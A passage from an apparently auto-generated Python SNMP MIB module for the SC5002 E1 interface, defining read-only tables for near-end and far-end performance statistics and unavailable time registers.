if mibBuilder.loadTexts: sc5002NearEndValidIntervals.setDescription('The number of previous intervals for which valid data was collected. The value will be 16 unless the interface was brought on-line within the last 4 hours, in which case the value will be the number of complete 15 minute intervals the since interface has been online.')
sc5002FarEndValidIntervals = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 10), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndValidIntervals.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndValidIntervals.setDescription('The number of previous intervals for which valid data was collected. The value will be 16 unless the interface was brought on-line within the last 4 hours, in which case the value will be the number of complete 15 minute intervals the since interface has been online.')
sc5002SysUpTime = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 5, 1, 1, 11), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002SysUpTime.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002SysUpTime.setDescription('This variable is used to report the elapsed system tick time for conversion to real time at the controller and is not related to the sysUpTime referenced in MIB-II. Upon power-up of the unit, the elapsed time is cleared. The elapsed time counter rolls over upon reaching the maximum count.')
# Performance group (…8.6): near-end statistics delivered as fixed-length
# packed octet strings (bit layouts are spelled out in each description).
sc5002NearEndCurrent15MinTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1), )
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinTable.setDescription('The sc5002 Current table.')
sc5002NearEndCurrent15MinEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndCurrent15MinIndex"))
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinEntry.setDescription('An entry in the sc5002 NearEnd Current table.')
sc5002NearEndCurrent15MinIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndCurrent15MinStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 1, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent15MinStat.setDescription('Returns a bitwise snapshot of the current 15Min statistics. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 Counter Overflow (>65535) LCV 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 LCV . 11.0 2^7 12.7 f/u 12.6 2^6 LCV . 12.0 2^0 ')
sc5002NearEndIntervalTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2), )
if mibBuilder.loadTexts: sc5002NearEndIntervalTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalTable.setDescription('The sc5002 Interval table.')
sc5002NearEndIntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndIntervalIndex"), (0, "SC5002-MIB", "sc5002NearEndIntervalNumber"))
if mibBuilder.loadTexts: sc5002NearEndIntervalEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalEntry.setDescription('An entry in the E1 Interval table.')
sc5002NearEndIntervalIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalNumber.setDescription('The number of Errored Seconds encountered by an E1 interface in one of the previous 16, individual 15 minute, intervals.')
sc5002NearEndIntervalStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 2, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndIntervalStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndIntervalStat.setDescription('Returns a bitwise map of the interface in one of the previous 16, individual 15 minute, intervals. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 Counter Overflow (>65535) LCV 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 LCV . 11.0 2^7 12.7 f/u 12.6 2^6 LCV . 12.0 2^0 ')
sc5002NearEndCurrent24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3), )
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrTable.setDescription('The E1 Current24Hr table. 4 hour interval.')
sc5002NearEndCurrent24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndCurrent24HrIndex"))
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrEntry.setDescription('An entry in the E1 Total table.')
sc5002NearEndCurrent24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndCurrent24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 3, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(15, 15)).setFixedLength(15)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndCurrent24HrStat.setDescription('Returns a bitwise map of the current 24 hour table 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 -- 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 13.7 f/u 13.6 f/u 13.5 f/u 13.4 f/u 13.3 f/u 13.2 1: Counter Overflow (>65535) LCV 13.1 2^15 13.0 2^14 14.7 f/u 14.6 2^13 LCV . 14.0 2^7 15.7 f/u 15.6 2^6 LCV . 15.0 2^0 ')
sc5002NearEndRecent24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4), )
if mibBuilder.loadTexts: sc5002NearEndRecent24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrTable.setDescription('The E1 Recent24Hr table. 4 hour interval.')
sc5002NearEndRecent24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndRecent24HrIndex"))
if mibBuilder.loadTexts: sc5002NearEndRecent24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrEntry.setDescription('An entry in the E1 Total table.')
sc5002NearEndRecent24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndRecent24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndRecent24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 4, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(15, 15)).setFixedLength(15)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndRecent24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndRecent24HrStat.setDescription('Returns a bitwise map of the current 24 hour table 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 -- 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 13.7 f/u 13.6 f/u 13.5 f/u 13.4 f/u 13.3 f/u 13.2 1: Counter Overflow (>65535) LCV 13.1 2^15 13.0 2^14 14.7 f/u 14.6 2^13 LCV . 14.0 2^7 15.7 f/u 15.6 2^6 LCV . 15.0 2^0 ')
sc5002FarEndCurrent15MinTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5), )
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinTable.setDescription('The sc5002FarEnd Current 15 minute table.')
sc5002FarEndCurrent15MinEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndCurrent15MinIndex"))
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinEntry.setDescription('An entry in the sc5002FarEnd Current 15 Minute table.')
sc5002FarEndCurrent15MinIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndCurrent15MinStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 5, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(9, 9)).setFixedLength(9)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndCurrent15MinStat.setDescription('Returns a bitwise map of the far end interface in one of the previous 16, individual 15 minute, intervals. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 -- 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 ')
sc5002FarEndIntervalTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6), )
if mibBuilder.loadTexts: sc5002FarEndIntervalTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalTable.setDescription('The sc5002FarEnd Interval table.')
sc5002FarEndIntervalEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndIntervalIndex"), (0, "SC5002-MIB", "sc5002FarEndIntervalNumber"))
if mibBuilder.loadTexts: sc5002FarEndIntervalEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalEntry.setDescription('An entry in the Interval table.')
sc5002FarEndIntervalIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndIntervalNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 16))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalNumber.setDescription('A number between 1 and 16, where 1 is the most recently completed 15 minute interval and 16 is the least recently completed 15 minutes interval (assuming that all 16 intervals are valid).')
sc5002FarEndIntervalStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 6, 1, 3), OctetString().subtype(subtypeSpec=ValueSizeConstraint(9, 9)).setFixedLength(9)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndIntervalStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndIntervalStat.setDescription('Returns a bitwise map of statistics for the far end interface in the current 15 minute interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 2^9 ES . 1.0 2^7 2.7 f/u 2.6 2^6 . 2.0 2^0 3.7 f/u 3.6 f/u 3.5 f/u 3.4 f/u 3.3 f/u 3.2 2^9 SES . 3.0 2^7 4.7 f/u 4.6 2^6 SES . 4.0 2^0 5.7 f/u 5.6 f/u 5.5 f/u 5.4 f/u 5.3 f/u 5.2 Counter Overflow (>65535) BBE 5.1 2^15 5.0 2^14 6.7 f/u 6.6 2^13 BBE . 6.0 2^7 7.7 f/u 7.6 2^6 BBE . 7.0 2^0 8.7 f/u 8.6 f/u 8.5 f/u 8.4 f/u 8.3 f/u 8.2 2^9 UAS . 8.0 2^7 9.7 f/u 9.6 2^6 UAS . 9.0 2^0 ')
sc5002CurrentFarEnd24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7), )
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrTable.setDescription('The Current 24 Hour table.')
sc5002CurrentFarEnd24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002CurrentFarEnd24HrIndex"))
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrEntry.setDescription('An entry in the Current 24 Hr table.')
sc5002CurrentFarEnd24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002CurrentFarEnd24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 7, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002CurrentFarEnd24HrStat.setDescription('Returns a bitwise map of statistics for the interface in the current 24 hour interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 -- 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 ')
sc5002RecentFarEnd24HrTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8), )
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrTable.setDescription('The Recent 24 Hour table.')
sc5002RecentFarEnd24HrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002RecentFarEnd24HrIndex"))
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrEntry.setDescription('An entry in the Recent 24 Hr table.')
sc5002RecentFarEnd24HrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002RecentFarEnd24HrStat = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 8, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(12, 12)).setFixedLength(12)).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrStat.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002RecentFarEnd24HrStat.setDescription('Returns a bitwise map of statistics for the interface in the Recent 24 hour interval. 1.7 f/u 1.6 f/u 1.5 f/u 1.4 f/u 1.3 f/u 1.2 1: Counter Overflow (>65535) ES 1.1 2^15 1.0 2^14 2.7 f/u 2.6 2^13 ES . 2.0 2^7 3.7 f/u 3.6 2^6 ES . 3.0 2^0 4.7 f/u 4.6 f/u 4.5 f/u 4.4 f/u 4.3 f/u 4.2 1: Counter Overflow (>65535) SES 4.1 2^15 4.0 2^14 5.7 f/u 5.6 2^13 SES . 5.0 2^7 6.7 f/u 6.6 2^6 SES . 6.0 2^0 7.7 f/u 7.6 f/u 7.5 f/u 7.4 f/u 7.3 f/u 7.2 1: Counter Overflow (>65535) BBE 7.1 2^15 7.0 2^14 8.7 f/u 8.6 2^13 BBE . 8.0 2^7 9.7 f/u 9.6 2^6 BBE . 9.0 2^0 10.7 f/u 10.6 f/u 10.5 f/u 10.4 f/u 10.3 f/u 10.2 1: Counter Overflow (>65535) UAS 10.1 2^15 10.0 2^14 11.7 f/u 11.6 2^13 UAS . 11.0 2^7 12.7 f/u 12.6 2^6 UAS . 12.0 2^0 ')
sc5002NearEndUnavailableTimeRegTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9), )
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegTable.setDescription('The sc5002 Unavailable Time Register table.')
sc5002NearEndUnavailableTimeRegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002NearEndUnavailableTimeRegIndex"), (0, "SC5002-MIB", "sc5002NearEndUnavailableTimeRegNumber"))
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegEntry.setDescription('An entry in the Unavailable Time Register table.')
sc5002NearEndUnavailableTimeRegIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002NearEndUnavailableTimeRegNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegNumber.setDescription('A number between 1 and 6, where the number is the number of the Unavailable Time Register.')
sc5002NearEndUnavailableTimeRegStart = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStart.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStart.setDescription('Start time of one of the Unavailable Time Registers.')
sc5002NearEndUnavailableTimeRegStop = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 9, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStop.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002NearEndUnavailableTimeRegStop.setDescription('Stop time of one of the Unavailable Time Registers.')
sc5002FarEndUnavailableTimeRegTable = MibTable((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10), )
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegTable.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegTable.setDescription('The sc5002 Unavailable Time Register table.')
sc5002FarEndUnavailableTimeRegEntry = MibTableRow((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1), ).setIndexNames((0, "SC5002-MIB", "sc5002FarEndUnavailableTimeRegIndex"), (0, "SC5002-MIB", "sc5002FarEndUnavailableTimeRegNumber"))
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegEntry.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegEntry.setDescription('An entry in the Unavailable Time Register table.')
sc5002FarEndUnavailableTimeRegIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 1), SCinstance()).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegIndex.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegIndex.setDescription('Integer value which uniquely identifies the SC5002 to which this entry is applicable. SCinstance is defined to be ssllddcc where: ss (byte value) - physical shelf slot location (01-32) ll (byte value) - line number (01-128) dd (byte value) - drop number (00-31) cc (byte value) - channel or interface number (always 00)')
sc5002FarEndUnavailableTimeRegNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 6))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegNumber.setStatus('mandatory')
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegNumber.setDescription('A number between 1 and 6, where the number is the number of the Unavailable Time Register.')
sc5002FarEndUnavailableTimeRegStart = MibTableColumn((1, 3, 6, 1, 4, 1, 498, 6, 8, 6, 10, 1, 3), Integer32().subtype(subtypeSpec=ValueRangeConstraint(1, 2147483647))).setMaxAccess("readonly")
if mibBuilder.loadTexts: sc5002FarEndUnavailableTimeRegStart.setStatus('mandatory')
